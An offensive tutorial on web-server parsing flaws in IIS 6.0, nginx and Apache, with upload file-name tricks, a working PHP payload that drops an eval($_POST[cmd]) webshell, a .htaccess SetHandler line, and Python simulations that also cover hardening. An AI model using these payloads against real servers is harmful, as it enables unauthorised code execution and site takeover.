Getting a webshell through various parsing vulnerabilities
I. IIS 6.0 parsing vulnerability
IIS 6.0 parsing can be exploited in two ways:
1. Directory parsing
/xx.asp/xx.jpg
2. File parsing
wooyun.asp;.jpg
First, when a folder under the website is named with a .asp or .asa extension, every file inside that directory, whatever its own extension, is parsed and executed by IIS as an ASP file.
For example, if you create a directory named wooyun.asp, then
/wooyun.asp/1.jpg
will be executed as an ASP file. So if the attacker can control the path of the upload folder, the name the uploaded image is given no longer matters: any file placed under that directory yields a shell.
Second, IIS 6.0 ignores everything after a semicolon when mapping the file name, which means
wooyun.asp;.jpg
is treated by the server as wooyun.asp.
Besides .asp, the extensions IIS 6.0 executes by default also include these three:
/wooyun.asa
/wooyun.cer
/wooyun.cdx
IIS 6.0 parsing vulnerability exploitation cases on WooYun:
http://www.wooyun.org/searchbug.php?q=IIS6.0
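As an added example (not code from the original post, and it does not talk to a real IIS), here is a small Python model of the two IIS 6.0 rules above. It is used to show which upload names a blacklist that only inspects the final extension lets through while IIS 6.0 still executes them. The directory and file names, and the whitelist in hardened_accepts, are constructed for the example; the four executable extensions are the ones listed above.

```python
import re

# Extensions IIS 6.0 maps to asp.dll by default (the four listed above).
IIS6_ASP_EXTENSIONS = frozenset({".asp", ".asa", ".cer", ".cdx"})

# Whitelist used by the hardened check below (constructed for this example).
SAFE_UPLOAD_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(jpg|jpeg|png|gif)$")


def last_extension(name):
    """Extension of one path component, lower-cased ('' if it has none)."""
    dot = name.rfind(".")
    return name[dot:].lower() if dot >= 0 else ""


def iis6_script_for(request_path):
    """Return the path IIS 6.0 hands to asp.dll for request_path, or None.

    Directory parsing: any file below a directory whose own name ends in an
    ASP extension is executed, whatever the file's extension.
    File parsing: the name used for script mapping stops at the first ';',
    so 'wooyun.asp;.jpg' is mapped as 'wooyun.asp'.
    """
    parts = [p for p in request_path.split("/") if p]
    if not parts:
        return None
    for directory in parts[:-1]:
        if last_extension(directory) in IIS6_ASP_EXTENSIONS:
            return "/" + "/".join(parts)
    mapped_name = parts[-1].split(";", 1)[0]
    if last_extension(mapped_name) in IIS6_ASP_EXTENSIONS:
        return "/" + "/".join(parts[:-1] + [mapped_name])
    return None


def naive_blacklist_allows(filename, blocked=IIS6_ASP_EXTENSIONS):
    """The weak upload check: reject only when the final extension is blocked."""
    return last_extension(filename) not in blocked


def hardened_accepts(filename):
    """Whitelist instead: one dot, an image extension, no ';' or '/'.
    Pair it with a server-chosen storage directory the client cannot name."""
    return SAFE_UPLOAD_NAME.match(filename) is not None


def bypasses(upload_dir, filename):
    """True when the naive check lets filename through but IIS 6.0 runs it."""
    path = upload_dir.rstrip("/") + "/" + filename
    return naive_blacklist_allows(filename) and iis6_script_for(path) is not None


if __name__ == "__main__":
    # Constructed inputs: a semicolon name, an attacker-named directory,
    # an alternative ASP extension, and a harmless control.
    for upload_dir, name in [("/upload", "wooyun.asp;.jpg"),
                             ("/wooyun.asp", "1.jpg"),
                             ("/upload", "wooyun.cer;.jpg"),
                             ("/upload", "wooyun.jpg")]:
        print(f"{upload_dir}/{name:<16} blacklist allows: {naive_blacklist_allows(name)!s:<5} "
              f"whitelist accepts: {hardened_accepts(name)!s:<5} "
              f"IIS 6.0 executes: {iis6_script_for(upload_dir + '/' + name)}")
```

Running it shows the point of the section: both bypass names pass the blacklist, and only the whitelist (which rejects the ';' and the second dot outright, and never lets the client pick the directory) stops them.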
II. IIS 7.0 / Nginx <8.03 malformed parsing vulnerability
This Nginx parsing vulnerability was discovered by the Chinese security team 80sec ...
With the default FastCGI configuration (PHP's cgi.fix_pathinfo=1), the attacker uploads a file named wooyun.jpg whose content is
<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
and then requests wooyun.jpg/x.php; this generates a one-line webshell, shell.php, in the same directory.
Cases of this vulnerability:
WooYun: UF Software sub-site SQL injection + nginx parsing vulnerability
WooYun: Sina sub-site multiple security flaws bundle (nginx parsing + SQL injection, etc.)
WooYun: kingsoft.com subdomain nginx parsing vulnerability + path disclosure
III. Nginx <8.03 null byte code execution vulnerability
Affected versions:
0.5.*, 0.6.*, 0.7 <= 0.7.65, 0.8 <= 0.8.37
Embed PHP code in an image, then request xxx.jpg%00.php to execute the code.
Nginx null byte code execution cases:
http://www.wooyun.org/searchbug.php?q=%2500.php
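The wooyun.jpg/x.php request in section II and the xxx.jpg%00.php request in section III both end in the same hand-off from nginx to PHP-FPM, so the following added example (not code from the original post, nginx or PHP) models that hand-off in Python. The nginx location ~ \.php$ block passes SCRIPT_FILENAME = $document_root + URI; PHP's cgi.fix_pathinfo=1 walks a non-existent script path back to the nearest existing file, which is the uploaded image, and runs it; and in the affected nginx versions a decoded %00 inside the path truncated the C string, so again the image was opened. DOCROOT and the filesystem FILES are constructed, and the keyword knobs are this model's names for the real settings: cgi.fix_pathinfo, PHP-FPM's security.limit_extensions (default .php since PHP 5.3.9), nginx's try_files $uri =404;, and whether the nginx build is one of the affected versions.

```python
import posixpath
import re
from urllib.parse import unquote

DOCROOT = "/var/www"
# Constructed filesystem: the uploaded "image" exists, x.php does not.
FILES = frozenset({"/var/www/index.php", "/var/www/upload/wooyun.jpg"})


def fix_pathinfo_walk(script_filename, files):
    """cgi.fix_pathinfo=1: strip trailing components until an existing file is
    found; the stripped tail becomes PATH_INFO. Returns (script, path_info)."""
    path, path_info = script_filename, ""
    while path not in ("", "/"):
        if path in files:
            return path, path_info
        path, tail = posixpath.split(path)
        path_info = "/" + tail + path_info
    return None, None


def dispatch(raw_uri, files=FILES, *, fix_pathinfo=True, limit_extensions=(".php",),
             try_files=False, nul_truncates=False):
    r"""Return the file PHP ends up executing for raw_uri, or None.

    Knobs (all assumptions of this model, named after the real settings):
      fix_pathinfo      php.ini cgi.fix_pathinfo (1 is PHP's default)
      limit_extensions  php-fpm security.limit_extensions; () models a pool
                        from before that option existed (PHP < 5.3.9)
      try_files         nginx 'try_files $uri =404;' inside the PHP location
      nul_truncates     an nginx build from the affected list above, which
                        passed the decoded NUL through to the FastCGI path
    """
    uri = unquote(raw_uri)                     # %00 becomes "\x00"
    if "\x00" in uri and not nul_truncates:
        return None                            # fixed nginx rejects the request
    if not re.search(r"\.php$", uri):
        return None                            # 'location ~ \.php$' not hit
    script = DOCROOT + uri                     # SCRIPT_FILENAME
    if nul_truncates:
        script = script.split("\x00", 1)[0]    # C string ends at the NUL
    if try_files and script not in files:
        return None                            # nginx answers 404 itself
    if fix_pathinfo:
        script, _path_info = fix_pathinfo_walk(script, files)
    elif script not in files:
        script = None
    if script is None:
        return None                            # "No input file specified."
    if limit_extensions and posixpath.splitext(script)[1] not in limit_extensions:
        return None                            # php-fpm: "Access denied."
    return script


if __name__ == "__main__":
    cases = [
        ("/index.php", {}),
        ("/upload/wooyun.jpg/x.php", {"limit_extensions": ()}),
        ("/upload/wooyun.jpg/x.php", {"limit_extensions": (), "fix_pathinfo": False}),
        ("/upload/wooyun.jpg/x.php", {"limit_extensions": (), "try_files": True}),
        ("/upload/wooyun.jpg/x.php", {}),
        ("/upload/wooyun.jpg%00.php", {"limit_extensions": (), "nul_truncates": True}),
        ("/upload/wooyun.jpg%00.php", {"limit_extensions": ()}),
    ]
    for uri, knobs in cases:
        label = str(knobs) if knobs else "hardened defaults"
        print(f"{uri:<28} {label:<58} -> {dispatch(uri, **knobs)}")
```

Running it shows that the pathinfo request reaches the image only with fix_pathinfo=1, no limit_extensions and no try_files, so any one of the three settings closes that path; the %00 variant additionally needs an nginx from the affected list, which is why it is listed with explicit version bounds.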
IV. Apache parsing vulnerability
Apache evaluates extensions from right to left; if it does not recognise an extension it moves on to the next one to the left.
For example, in wooyun.php.owf.rar the suffixes .owf and .rar are both unknown to Apache, so Apache treats wooyun.php.owf.rar as PHP.
Working out which suffixes are recognised is the key to exploiting this. To test, upload something like wooyun.php.rara.jpg.png... (append the common suffixes you know ...) and see which of them are valid suffixes.
Apache parsing vulnerability cases, and two related upload bypasses
File names such as xx.jpg[space] or xx.jpg. cannot exist on Windows: when such a name is used, Windows silently removes the trailing space or dot. An attacker can therefore intercept the upload request and append a space or a dot to the file name to get past a blacklist; if the upload succeeds, Windows strips the trailing space or dot automatically, which also gives a shell.
If the server is Apache, .htaccess files are honoured, and .htaccess can be uploaded, you can try writing the following into .htaccess:
SetHandler application/x-httpd-php
and then upload the webshell as shell.jpg; shell.jpg will then be parsed as a PHP file.
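As an added example (not code from the post or from Apache), the Python below models the Apache side of this section: the right-to-left extension walk, a per-directory .htaccess SetHandler, the Windows trailing dot/space normalisation, and the FilesMatch "\.php$" binding that current distributions use instead. KNOWN_EXTENSIONS is a constructed subset of mime.types, and the walk assumes PHP is bound with AddType, which gives exactly the rightmost-recognised-extension rule described above; with AddHandler instead, mod_mime keeps the handler set by a .php component even when a later extension sets the type, so names like wooyun.php.jpg can run as well. The upload names with a trailing dot or space are constructed.

```python
import re

PHP = "application/x-httpd-php"
# Constructed subset of what this Apache "knows" (mime.types / AddType).
# Anything not in here is skipped during the right-to-left walk.
KNOWN_EXTENSIONS = {"php": PHP, "jpg": "image/jpeg", "png": "image/png",
                    "gif": "image/gif", "txt": "text/plain", "html": "text/html"}


def mod_mime_type(filename, known=KNOWN_EXTENSIONS, htaccess_sethandler=None):
    """Type Apache assigns to filename under the rule described above:
    a SetHandler from the directory's .htaccess wins outright; otherwise the
    rightmost recognised extension decides and unknown ones are skipped."""
    if htaccess_sethandler:
        return htaccess_sethandler
    for ext in reversed(filename.split(".")[1:]):
        if ext.lower() in known:
            return known[ext.lower()]
    return None


def apache_runs_php(filename, **kw):
    return mod_mime_type(filename, **kw) == PHP


def probe_suffixes(base, candidates, **kw):
    """The test suggested above: which trailing suffixes are unknown to Apache
    and therefore leave base (e.g. wooyun.php) executed as PHP?"""
    return [s for s in candidates if apache_runs_php(f"{base}.{s}", **kw)]


def files_match_runs_php(filename):
    r"""Hardened binding: <FilesMatch "\.php$"> SetHandler application/x-httpd-php
    </FilesMatch> fires only when the name really ends in .php."""
    return re.search(r"\.php$", filename, re.IGNORECASE) is not None


def windows_store_name(filename):
    """NTFS drops trailing spaces and dots when the file is created."""
    return filename.rstrip(" .")


def naive_blacklist_allows(filename, blocked=("php", "phtml", "php3")):
    """Blacklist on the final extension, as typically written."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in blocked


if __name__ == "__main__":
    print("suffixes unknown to Apache:",
          probe_suffixes("wooyun.php", ["rar", "jpg", "owf", "png", "txt"]))
    for name in ["wooyun.php.owf.rar", "wooyun.php.jpg", "shell.jpg"]:
        print(f"{name:<20} mod_mime: {mod_mime_type(name)!s:<24} "
              f"with .htaccess SetHandler: {mod_mime_type(name, htaccess_sethandler=PHP)}")
    # Constructed upload names with a trailing dot/space (the Windows trick).
    for name in ["shell.php.", "shell.php "]:
        stored = windows_store_name(name)
        print(f"{name!r:<14} blacklist allows: {naive_blacklist_allows(name)}, "
              f"stored as {stored!r}, FilesMatch runs it: {files_match_runs_php(stored)}")
```

The probe output is the list the text tells you to build by hand: every suffix that still leaves wooyun.php.<suffix> typed as PHP is one Apache does not know. The last loop shows why the Windows trick works against a blacklist: the check sees an empty or "php " extension and lets the name through, then the file is stored as shell.php and any PHP binding, FilesMatch included, will execute it; the fix is to normalise and whitelist the name before the blacklist ever runs.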